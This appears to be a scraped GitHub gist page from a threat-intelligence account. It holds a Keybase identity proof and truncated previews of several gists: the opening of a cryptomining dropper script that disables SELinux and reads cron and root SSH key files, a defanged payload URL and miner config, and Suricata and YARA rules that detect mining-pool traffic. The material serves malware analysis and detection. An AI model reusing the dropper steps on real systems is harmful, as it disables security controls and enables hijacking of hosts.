I hereby claim:
- I am gelossnake on github.
- I am gelossnake (https://keybase.io/gelossnake) on keybase.
- I have a public key ASAwA_u6Qo3Rss8MsguyHw0fr0ouch111TV1zcmoTwOk0wo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
#!/bin/sh | |
setenforce 0 2>dev/null | |
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null | |
sync && echo 3 >/proc/sys/vm/drop_caches | |
crondir='/var/spool/cron/'"$USER" | |
cont=`cat ${crondir}` | |
ssht=`cat /root/.ssh/authorized_keys` | |
echo 1 > /etc/devtools | |
rtdir="/etc/devtools" | |
bbdir="/usr/bin/curl" |
related hash: 21ab6585aacf15cbf414d492c470a987a5f47602a441816cbea3c69aa715b6cc | |
source: hxxp://45[.]76.122.92:8506/IOFoqIgyC0zmf2UR/config.json | |
{ | |
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite | |
"av": 0, // algorithm variation, 0 auto select | |
"background": true, // true to run the miner in the background | |
"colors": true, // false to disable colored output | |
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1 |
#Suricata 3.2+ | |
alert dns $HOME_NET any -> any any (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minergate.com)"; dns_query; content:"pool.minergate.com"; nocase; isdataat:!1,relative; classtype:trojan-activity; sid:20000000; rev:1;) | |
#Suricata 1.3+ | |
alert udp $HOME_NET any -> any 53 (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minergate.com)"; content:"|01|"; offset:2; depth:1; content:"|00 01 00 00 00 00 00|"; distance:1; within:7; content:"|04|pool|09|minergate|03|com|00|"; nocase; distance:0; fast_pattern; classtype:trojan-activity; sid:20000000; rev:1;) | |
#Suricata 3.2+ | |
alert dns $HOME_NET any -> any any (msg:"Observed DNS Query to public CryptoMining pool Domain (pool.minexmr.com)"; dns_query; content:"pool.minexmr.com"; nocase; isdataat:!1,relative; classtype:trojan-activity; sid:20000001; rev:1;) |
rule MinerGate | |
{ | |
strings: | |
$a1 = "minergate.com" | |
condition: | |
$a1 | |
} | |
rule MoneroOrg | |
{ |